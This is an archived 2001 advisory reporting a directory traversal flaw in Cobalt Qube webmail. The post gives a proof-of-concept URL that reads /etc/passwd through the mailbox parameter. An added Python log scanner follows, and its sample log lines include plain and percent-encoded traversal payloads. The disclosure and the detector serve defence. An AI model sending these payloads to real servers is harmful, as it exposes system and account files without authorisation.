Computer Security
[EN] securityvulns.ru



Related information

  Reverse path in Cobalt Qube webmail (directory traversal)

From: Kevin Finisterre <dotslash_(at)_snosoft.com>
Date: 06.07.2001
Subject: Cobalt Cube Webmail directory traversal

I just got a new Cobalt Cube today and I have been poking around at it
for security issues... I noticed this minor issue in the webmail system.
Your users are not allowed to have shell access by default; however, if
they malform their mailbox requests they can read local files with the
perms of the webserver. If your users have shell access they will not
really be gaining anything; however, this could be used to remotely
gather information for a future attack.

[admin admin]$ uname -a
Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
[admin admin]$ cat /etc/issue

Cobalt Linux release 6.0 (Carmel)
Kernel 2.2.16C7 on an i586

http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1

-KF
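
Added example, not part of the original post: a log check an administrator could run to find readmsg.php requests whose mailbox parameter escapes the mail directory, including percent-encoded forms. The Common Log Format layout, the sample log lines, and the function names are assumptions constructed for illustration; only the script path and parameter name come from the post.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a Common Log Format entry: "GET /path?query HTTP/1.x"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so a doubly encoded '..' is still recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(mailbox):
    """True if a mailbox value is absolute, has a NUL, or has a '..' segment."""
    path = fully_decode(mailbox).replace("\\", "/")
    if path.startswith("/") or "\x00" in path:
        return True
    return ".." in path.split("/")

def suspicious_requests(log_lines, script="/base/webmail/readmsg.php"):
    """Return (line_number, decoded_mailbox) for readmsg.php hits with traversal."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != script:
            continue
        for mailbox in parse_qs(url.query).get("mailbox", []):
            if is_traversal(mailbox):
                hits.append((number, fully_decode(mailbox)))
    return hits

# Constructed sample log lines (hypothetical hosts and users, not from the post).
SAMPLE_LOG = [
    '192.0.2.10 - alice [06/Jul/2001:10:00:01 -0700] "GET /base/webmail/readmsg.php?mailbox=INBOX&id=1 HTTP/1.0" 200 5120',
    '192.0.2.44 - bob [06/Jul/2001:10:02:13 -0700] "GET /base/webmail/readmsg.php?mailbox=../../../../etc/passwd&id=1 HTTP/1.0" 200 812',
    '192.0.2.44 - bob [06/Jul/2001:10:02:40 -0700] "GET /base/webmail/readmsg.php?mailbox=%252e%252e%2f%252e%252e%2fetc%2fissue&id=1 HTTP/1.0" 200 64',
    '192.0.2.10 - alice [06/Jul/2001:10:05:00 -0700] "GET /base/webmail/readmsg.php?mailbox=Sent..2001&id=3 HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for number, mailbox in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: mailbox={mailbox!r}")
```

A mailbox name that merely contains two dots (the last sample line) is not flagged, because the check looks at whole path segments after decoding.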
